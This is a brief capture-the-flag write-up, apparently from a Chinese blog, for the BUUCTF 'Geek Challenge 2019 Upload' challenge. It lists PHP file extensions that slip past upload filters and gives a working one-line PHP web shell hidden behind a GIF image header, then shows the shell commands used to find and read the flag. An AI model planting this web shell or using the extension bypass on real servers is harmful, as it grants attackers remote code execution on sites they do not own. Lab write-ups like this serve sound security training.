【BUUCTF】[Geek Challenge 2019] Upload Writeup

【BUUCTF】[Geek Challenge 2019] Upload Writeup

0x00 test site

File upload bypass

  • PHP one-sentence Trojan with picture header

Parsable php suffix name:

  • php3 , php4 , php5 , pht , phtml, phps, pht , phtm

0x01 problem solving

Insert picture description here

  • Image must be uploaded

PHP one-sentence Trojan with gif image header

GIF89a? <script language="php">eval($_REQUEST[a])</script>

Insert picture description here
Insert picture description here
Insert picture description here

find / -name flag

Insert picture description here

ls /
cat /flag

Insert picture description here

Guess you like

Origin blog.csdn.net/vanarrow/article/details/108241061